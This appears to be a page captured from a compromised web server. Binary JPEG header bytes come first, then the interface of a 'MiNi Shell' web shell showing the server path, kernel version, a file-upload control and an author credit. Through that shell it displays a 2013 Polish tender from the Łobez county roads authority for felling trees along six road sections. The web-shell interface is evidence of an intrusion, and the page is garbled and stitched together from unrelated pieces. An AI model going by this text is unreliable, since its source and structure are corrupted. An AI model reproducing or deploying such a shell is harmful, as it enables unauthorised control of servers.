JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130801/307348-N-2013.html

<p class="kh_header"><b>Łobez: Wycinka drzew zlokaliozowanych na terenie powiatu łobeskiego z podziałem na 6 zadań</b><br>
<b>Numer ogłoszenia: 307348 - 2013; data zamieszczenia: 01.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Łobzie , ul. Niepodległości 35, 73-150 Łobez, woj. zachodniopomorskie, tel. 091 3974066, faks 091 3974066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zdp.lobez.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka JST.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wycinka drzew zlokaliozowanych na terenie powiatu łobeskiego z podziałem na 6 zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. ZADANIE NR 1 -  GMINA RESKO - Wycinka 95 szt. drzew rosnących w ciągu drogi powiatowej nr 4308Z Mołdawin - Żerzyno
B. ZADANIE NR 2 -  GMINA RESKO - Wycinka 15 szt. drzew rosnących w ciągu drogi powiatowej nr 4335Z Komorowo - Luboradz - Resko oraz 74 szt. drzew rosnących w ciągu drogi powiatowej nr 4331Z Starogard Łobeski - Krosino 
C. ZADANIE NR 3 -  GMINA RESKO - Wycinka 117 szt. drzew rosnących w ciągu drogi powiatowej nr 4313Z Łabuń Wlk. - Stara Dobrzyca
D. ZADANIE NR 4 - GMINA WĘGORZYNO - Wycinka  68 szt. drzew rosnących w ciągu drogi powiatowej nr 4314Z Węgorzyno - Podlipce oraz 40 szt. drzew rosnących w ciągu drogi powiatowej nr 4345Z Winniki - Węgorzyno 
E. ZADANIE NR 5 - GMINA WĘGORZYNO - Wycinka 67 szt. drzew rosnących w ciągu drogi powiatowej nr 4342Z Runowo - Lesięcin 
F. ZADANIE NR 6 - GMINA RESKO - Wycinka 110 szt. drzew rosnących w ciągu drogi powiatowej nr 3136Z /Gryfice - Modlimowo/ granica powiatu - Resko 

Po wykonaniu usługi w rozliczeniu Wykonawca nabywa na własność pozyskane drewno po cenie:

Zadanie nr 1:
a)	drewno średniowymiarowe S2 (papierówka) - 95,00 zł netto / m3
b)	drewno średniowymiarowe S4 (opał) - 64,70 zł netto / m3
c)	drewno małowymiarowe M2 (gałęziówka) - 36,00 zł netto / m3 

Zadanie nr 2:
A. droga powiatowa nr 4335Z Komorowo - Luboradz - Resko
a)	drewno średniowymiarowe S2 (papierówka) - 203,00 zł netto / m3
b)	drewno średniowymiarowe S4 (opał) - 141,52 zł netto / m3
c)	drewno małowymiarowe M2 (gałęziówka) - 36,00 zł netto / m3 
B. droga powiatowa nr 4331Z Starogard Łobeski - Krosino
a)	drewno średniowymiarowe S2 (papierówka) -  170,22 zł netto / m3
b)	drewno średniowymiarowe S4 (opał) -  154,03 zł netto / m3
c)	drewno małowymiarowe M2 (gałęziówka) -  36,00 zł netto / m3 

Zadanie nr 3:
a)	drewno średniowymiarowe S2 (papierówka) -  135,87 zł netto / m3
b)	drewno średniowymiarowe S4 (opał) -  133,94 zł netto / m3
c)	drewno małowymiarowe M2 (gałęziówka) -  36,00 zł netto / m3 

Zadanie nr 4:
A. droga powiatowa nr 4314Z Węgorzyno - Podlipce:
a)	drewno średniowymiarowe S2 (papierówka) -  105,00 zł netto / m3
b)	drewno średniowymiarowe S4 (opał) -  85,00 zł netto / m3
c)	drewno małowymiarowe M2 (gałęziówka) -  47,00 zł netto / m3 
B. droga powiatowa nr 4345Z Winniki - Węgorzyno
a)	drewno średniowymiarowe S2 (papierówka) - 95,63 zł netto / m3
b)	drewno średniowymiarowe S4 (opał) - 69,77 zł netto / m3
c)	drewno małowymiarowe M2 (gałęziówka) - 47,00 zł netto / m3 

Zadanie nr 5:
a)	drewno średniowymiarowe S2 (papierówka) - 187,73 zł netto / m3
b)	drewno średniowymiarowe S4 (opał) - 158,10  zł netto / m3
c)	drewno małowymiarowe M2 (gałęziówka) - 49,00 zł netto / m3 

Zadanie nr 6:
a)	drewno średniowymiarowe S4 (opał) - 135,63  zł netto / m3
b)	drewno małowymiarowe M2 (gałęziówka) - 36,00 zł netto / m3 

a wynagrodzenie wykonawcy będzie pomniejszone o wartość drewna. W przypadku, gdy wartość drewna jest wyższa niż wartość usługi wykonawca zapłaci różnicę na rzecz zamawiającego. Zamawiający nie przewiduje zapłaty różnicy na rzecz wykonawcy. 

Zamawiający zastrzega, że drzewa powinny być wycinane kolejno na danym odcinku drogi. W przypadku gdy w zadaniu znajdują się drzewa do wycinki na kilku odcinkach dróg należy je wycinać kolejno odcinkami poszczególnych dróg..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca musi przedstawić wykaz 2 wykonanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których zostały wykonane oraz załączeniem dowodów że zostały wykonane należycie. W przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca musi przedstawić wykaz 2 osób - pilarzy oraz 2 osób odpowiedzialnych za kierowanie ruchem, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych oraz doświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedstawić opłaconą polisę lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 50.000,00 zł (pięćdziesiąt tysięcy zł).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zdp.lobez.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Łobzie, ul. Niepodległości 35, 73-150 Łobez.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2013 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Łobzie, ul. Niepodległości 35, 73-150 Łobez.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1 -  GMINA RESKO - Wycinka 95 szt. drzew rosnących w ciągu drogi powiatowej nr 4308Z Mołdawin - Żerzyno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 -  GMINA RESKO - Wycinka 95 szt. drzew rosnących w ciągu drogi powiatowej nr 4308Z Mołdawin - Żerzyno.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2 -  GMINA RESKO - Wycinka 15 szt. drzew rosnących w ciągu drogi powiatowej nr 4335Z Komorowo - Luboradz - Resko oraz 74 szt. drzew rosnących w ciągu drogi powiatowej nr 4331Z Starogard Łobeski - Krosino.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 -  GMINA RESKO - Wycinka 15 szt. drzew rosnących w ciągu drogi powiatowej nr 4335Z Komorowo - Luboradz - Resko oraz 74 szt. drzew rosnących w ciągu drogi powiatowej nr 4331Z Starogard Łobeski - Krosino.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3 -  GMINA RESKO - Wycinka 117 szt. drzew rosnących w ciągu drogi powiatowej nr 4313Z Łabuń Wlk. - Stara Dobrzyca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3 -  GMINA RESKO - Wycinka 117 szt. drzew rosnących w ciągu drogi powiatowej nr 4313Z Łabuń Wlk. - Stara Dobrzyca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4 - GMINA WĘGORZYNO - Wycinka  68 szt. drzew rosnących w ciągu drogi powiatowej nr 4314Z Węgorzyno - Podlipce oraz 40 szt. drzew rosnących w ciągu drogi powiatowej nr 4345Z Winniki - Węgorzyno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 4 - GMINA WĘGORZYNO - Wycinka  68 szt. drzew rosnących w ciągu drogi powiatowej nr 4314Z Węgorzyno - Podlipce oraz 40 szt. drzew rosnących w ciągu drogi powiatowej nr 4345Z Winniki - Węgorzyno.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE NR 5 - GMINA WĘGORZYNO - Wycinka 67 szt. drzew rosnących w ciągu drogi powiatowej nr 4342Z Runowo - Lesięcin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 5 - GMINA WĘGORZYNO - Wycinka 67 szt. drzew rosnących w ciągu drogi powiatowej nr 4342Z Runowo - Lesięcin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE NR 6 - GMINA RESKO - Wycinka 110 szt. drzew rosnących w ciągu drogi powiatowej nr 3136Z /Gryfice - Modlimowo/ granica powiatu - Resko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 6 - GMINA RESKO - Wycinka 110 szt. drzew rosnących w ciągu drogi powiatowej nr 3136Z /Gryfice - Modlimowo/ granica powiatu - Resko.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com